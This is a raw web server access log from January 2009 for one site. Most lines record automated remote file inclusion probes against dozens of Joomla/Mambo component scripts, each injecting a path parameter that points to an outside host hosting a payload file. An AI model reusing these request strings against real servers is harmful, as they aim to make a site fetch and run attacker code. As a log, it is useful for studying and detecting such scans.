89.111.180.85 - - [06/Jan/2009:08:19:21 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:21 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:19:22 -0800] "GET /?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 200 94803 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:22 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:22 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:22 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:22 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:23 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:23 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:23 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:23 -0800] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:24 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:24 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:25 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:25 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:25 -0800] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:25 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:26 -0800] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:26 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:26 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:26 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:27 -0800] "GET /logs//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:27 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:27 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:27 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:28 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:28 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:28 -0800] "GET /logs//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:28 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:29 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:29 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:29 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:29 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:30 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:30 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:30 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:30 -0800] "GET /logs/access_080530.log%20%20//akocomments.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:31 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:31 -0800] "GET /logs/access_080530.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:31 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:31 -0800] "GET /logs/access_080530.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:32 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:32 -0800] "GET /logs/access_080530.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:32 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:32 -0800] "GET /logs/access_080530.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:33 -0800] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:33 -0800] "GET /logs/access_080530.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:33 -0800] "GET /logs/access_080530.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:33 -0800] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:34 -0800] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:34 -0800] "GET /logs/access_080530.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:34 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:34 -0800] "GET /logs/access_080530.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:35 -0800] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:35 -0800] "GET /logs/access_080530.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:35 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:35 -0800] "GET /logs/access_080530.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:36 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:36 -0800] "GET /logs/access_080530.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:36 -0800] "GET /logs/access_080530.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:37 -0800] "GET /logs/access_080530.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:38 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:38 -0800] "GET /logs/access_080530.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:38 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:38 -0800] "GET /logs/access_080530.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:38 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:39 -0800] "GET /logs/access_080530.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:39 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:39 -0800] "GET /logs/access_080530.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:08:19:39 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:08:19:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:39 -0800] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:40 -0800] "GET /logs/access_080530.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:40 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:40 -0800] "GET /logs/access_080530.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:40 -0800] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:41 -0800] "GET /logs/access_080530.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:41 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:19:41 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:41 -0800] "GET /logs/access_080530.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:41 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:19:41 -0800] "GET /logs/access_080211.log HTTP/1.1" 200 1095122 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:42 -0800] "GET /logs/access_080530.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:42 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:42 -0800] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:42 -0800] "GET /logs//components/com_minibb.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:42 -0800] "GET /logs/access_080530.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:43 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:43 -0800] "GET /logs/access_080530.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:43 -0800] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:43 -0800] "GET /logs/access_080530.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:44 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:44 -0800] "GET /logs/access_080530.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:44 -0800] "GET /logs//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:44 -0800] "GET /logs/access_080530.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:45 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:45 -0800] "GET /logs/access_080530.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:45 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:45 -0800] "GET /logs/access_080530.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
